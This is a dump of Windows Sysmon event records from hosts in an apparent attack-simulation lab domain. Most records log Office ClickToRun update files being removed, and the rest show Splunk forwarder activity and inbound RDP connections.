OLEDB\140\Cartridges\as80.xslMD5=F7764EDB7A6BC223E07DF8C3674159AD,SHA256=5D80A0A30D78431191F0A18DA67B53F6E805A53715C6C8D5BAABA3425950495F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071363Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrwbin.dllMD5=17B8973F45CF4CA09452106CD1170C9D,SHA256=16F8699CA839055D486638DE959131E7D78999B64A37C2B4CDEE6CE9C5D50877,IMPHASH=0148E6DCA799C1BD9A727A1A2C1F23B5truetrue 23542300x800000000000000071362Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\System\ole db\xmlrw.dllMD5=5984FE7657AA78278C720942B40CFEB8,SHA256=3714B80BC052E1496D755B26B8DDFDD103D89230F853BAE4AEC5B4DB4571442F,IMPHASH=407C03AA22236D4A639F20F62FDB139Atruetrue 23542300x800000000000000071361Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\FPWEC.DLLMD5=D4ED6A5A17464390FE1015EC6B20FA17,SHA256=1B60F2ECE9623F4D467E82FBF67337D9B71C07CDF2E21BD0E31ABADAED147C6F,IMPHASH=4BD6F08B8D42B56B1C6C2BA0C188FCC3truetrue 23542300x800000000000000071360Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Web Server Extensions\16\BIN\FPSRVUTL.DLLMD5=AFA0C8A7A0A078A114C129592023B7B6,SHA256=657F5207744A8343AF416C8E7E2BEEE996EF1633A0BC4B51A45F4187F7E85D2E,IMPHASH=EE2CCCEE2BBCFEF1BB268BCF028251CBtruetrue 23542300x800000000000000071359Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBUI6.CHMMD5=3481D198FDB7826746AEBA5195A4F701,SHA256=DC415EF73A1A923B15107AE73D44D7848EF8D9AECFED2D6FFAF88E9CA695BB15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071358Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBOB6.CHMMD5=7E9AFE12FA8C1CFA164789A720417032,SHA256=9BAB02384DB0E2CF6968E662673C11DE60B7E22C80317CC42822E72D1B67004B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071357Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBLR6.CHMMD5=11CC43E7DEBF7C5B86A201AB42507518,SHA256=B56AE972CE36A0A2484434FAC68EBBD692E27D34E389A0CB7E4EF0FFDCFE45FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071356Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBHW6.CHMMD5=5256D15E92EC519584547594FEBD1E47,SHA256=718441CD1D60A28B1DD0FF726F826CDB7EF9D230991B6F38248FAB680348AFFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071355Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBENDF98.CHMMD5=A447359D734BA81AC475CD27EF0C71F0,SHA256=30B013E894AB44BB84168C1E7FB671604B5E5D03E90DFFAA29550B66F7DF2F13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071354Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBCN6.CHMMD5=4B660F9237E1493D442FF11687DADE37,SHA256=8A5D2E38D41F808E232E957F7EB086FCA6473D5A7344B4C391E6E03FD3A1561F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071353Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\FM20.CHMMD5=D8C6C38E086BC1C5D5A961C07211D2A0,SHA256=87D120D47FBCFE9FDE459F04AF45B74A81297B7654C26BBA9784FBF60BA6048D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071352Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA6\VBE6EXT.OLBMD5=3240C1965B654B7B9E747D65725AE625,SHA256=B90E4E7D54EEC34EF91F22D28B4AFC6CB7473B52FBEEFD8ECF179554F24349C6,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071351Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dllMD5=FBB1EA58818F775A14415A6FB18B6010,SHA256=B61B0051EDE2F0C602E5E9DE0B4B73B408EA05E06A12DCE11FC917F0D7978333,IMPHASH=F2E20A4362E9D8B11345B2F604584C9Ftruetrue 23542300x800000000000000071350Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\1033\PortalConnect.dllMD5=51996E0B43405A5498D161057E3447D7,SHA256=68AE0BC84146723BF6B27AE0CB823A1EE3F028348E46F5461DAFD0C9A0603584,IMPHASH=B3F5E92AFF2BACF941BEACB0AE100699truetrue 23542300x800000000000000071349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vcruntime140.dllMD5=E51018E4985943C51FF91471F8906504,SHA256=FF9C1123CFF493A8F5EACB91115611B6C1C808B30C82AF9B6F388C0EF1F6B46D,IMPHASH=DBF59B100B5A77256457CF057352B441truetrue 23542300x800000000000000071348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\vccorlib140.dllMD5=E88E2BF24A4D846C7F8E313D75EED528,SHA256=2F7E17BC746ABF55122EE1D2608DB7240DE4B4428BE13DFEE8C3E03DB6F9B360,IMPHASH=E2C243EAA5D873A145FCEF834080DE02truetrue 23542300x800000000000000071347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ucrtbase.dllMD5=3E0303F978818E5C944F5485792696FD,SHA256=7041885B2A8300BF12A46510228CE8D103D74E83B1BAF696B84FF3E5AB785DD1,IMPHASH=71F1D8A10F840FFEE6964317E974D463truetrue 23542300x800000000000000071346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\TextIntelligence.dllMD5=92B4471DA267B672CC191E864A4EEBC2,SHA256=86FEF84DC7367E28CBC408E0AC062C43700F08E1299C7893150205293293E088,IMPHASH=1225A5501735C54A061181B9608C3692truetrue 23542300x800000000000000071345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\oregres.dllMD5=BD9E645F21A2CD93615BEFD21B264B67,SHA256=5706B9FD2637FC40B932BAB1626666A19BDCC47E8465BCDC668E860CEC1E647D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.485{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcr120.dllMD5=1A22AC29230FF06E278CF85992F48C86,SHA256=3A3F61F1D187142BBA9B37B318F6052A09743FF24FCDB3CEE478D1BC5C68D300,IMPHASH=AA8D086DEB6960B10F8791DF466A5610truetrue 23542300x800000000000000071343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.470{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcp140.dllMD5=5FD0772C30A923159055E87395F96D86,SHA256=02C7259456EAC8CBADFB460377BA68E98282400C7A4A9D0BF49B3313EF6D554D,IMPHASH=F2D585FF96AFA3A77E09F5B37E7B3230truetrue 23542300x800000000000000071342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msvcp120.dllMD5=E3244FDCEC84C99E4B60227EB3B70893,SHA256=81FBC2824E73F0D101D91854694A52E79DB0FFAADBB2A10DEAAF47B3B7F9B2B0,IMPHASH=6CCDA270A497A2C5A36A7F385CC9910Dtruetrue 23542300x800000000000000071341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLLMD5=F0CA122B8A52294CD35A1B1FE80ADBA9,SHA256=F9A204D04202D91009B2FF9F616CADD2D263BB0274042B9647202B7E10604374,IMPHASH=63589FC67A3F5977CD53A2B44E4DC95Etruetrue 23542300x800000000000000071340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\msoshext.dllMD5=E0AE1FB2D27326481CA288D5EE397AB5,SHA256=630A19462CACAEB20216FA21404D0CD3D7A1F88DCE739CF8DA9A92DAAE0E664A,IMPHASH=A5730E0214166605B60A3BD6D6EBE251truetrue 23542300x800000000000000071339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSORES.DLLMD5=A5316B00196A2DF444BDFCE0BDD1D747,SHA256=E2C999813BB64E35D14E01886619A728DE861BE6EBA1125102C30A22D933FB68,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000049821Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:47.895{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49736-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049820Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:49.215{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D3036D919635769A14EDCEAF456288,SHA256=38A984004DA32B99154DD1863D9E56925CD6EB8C9801124C5327436E4AFCB3BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft.NET\ADOMD.NET\130\Microsoft.AnalysisServices.AdomdClient.dllMD5=4748875BDBBF16EAC431FBA499FDECC6,SHA256=665C96C531908E9BFDBF120E62AD8EC1319B82FE89C7538046B8ACC561D03F94,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 354300x800000000000000071395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.170{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57711-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000071394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:49.117{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57507-false10.0.1.12-8000- 23542300x800000000000000071393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft SQL Server\130\Shared\msasxpress.dllMD5=3695D07485D47A47752251238ED9014D,SHA256=05B2F44382EBE522CD9090AD04C86E45C6B4D86EF8DBC0BED1C76584D1D4ACD0,IMPHASH=0E031F0405DFF92E629F4218525929A7truetrue 23542300x800000000000000071392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\xmsrv.dllMD5=4BDB36A785F647EE38D749A6485F1C72,SHA256=1B66C342D545A370E0BCC2E9F6884075C9AB770BBD3A01A84649CE7854E70790,IMPHASH=6900F8D590E29C3838436FB4C865FBDCtruetrue 23542300x800000000000000071391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeMD5=6295696237F75EBC2A28CAAF2F6146D6,SHA256=3B60A8A32AE8ED4CA92690DE3380EECC4A78252B2B78136B7F18C99D40C4608B,IMPHASH=B7C501B0DB1763B6E65FA369A35BA4F2truetrue 23542300x800000000000000071390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolui.dllMD5=C563AFE650676487F57ECF39A7551180,SHA256=AB0408C27EA462097B1B6B68D5A244BA9D454EE664B31AB09D1DDFBE053916D9,IMPHASH=1D3D69C30F7DA842478095C1717231AFtruetrue 23542300x800000000000000071389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msolap.dllMD5=2924E02EF139C1D042F42B684D9B0D07,SHA256=1B99ECDE802B68FB7078D70C672AEDD3245B4FF80CCD3721C5211C59C1199CBE,IMPHASH=C18BB273A74A26178E9868A25301A468truetrue 23542300x800000000000000071388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.563{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msmgdsrv.dllMD5=549B94BB0A051F525DEF416129B480F3,SHA256=1BFEE9B0B5DACBB6E56546EC97D6CEB13B00B5B78CA0C11269052E29A27550E2,IMPHASH=2E56BF9BB390066CFB8660EECBD31286truetrue 23542300x800000000000000071387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\msmdlocal.dllMD5=9EE7CC7A6F07657CA1AF98B58E9E82F9,SHA256=A34FB871E57CF71056572E64F9152CDC6BDA1B6D193EABD07BE2321979E36E8F,IMPHASH=CB9EC651C4BBDE4A5A18EC6D20C3F68Etruetrue 23542300x800000000000000071386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.063{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=52C6CA46A964E5194726AEAB4507F7DF,SHA256=D4CC853BD504927666935EC1F6DF8D0ACAD97D8BA656E02651DAEE24CEDC5E2B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.063{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8F069307BEBC6AE7EE52962B52B07F4,SHA256=A75290B8E39036B75C3117784C342E8B242727891EBF85878563C34D75A4A8E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000071384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.032{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2700-00000000BB01}2724C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000049823Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:50.231{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65F353B78E04AFBC4D9F82ABFA89BF30,SHA256=A725EFFD1A739CDE03CE87E8CD13D0A84B67DD8D29017C19EA2508DD5A1F2D7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049822Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:50.074{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A1C7AC7D181C31338648F5B89C8FBF2,SHA256=7942D996E908D290187C4F757917533BE72B61B35EAECB2A2A455D3B24629086,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.829{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeMD5=4D48E8A63822ECCF4A0449AD4ABECE70,SHA256=205869D72E967518B3A763F07FDFF693F60E4FBE33E3AAD792311D581E756414,IMPHASH=244E6D305C0F470BD32E301DC79E8FF9truetrue 23542300x800000000000000071420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 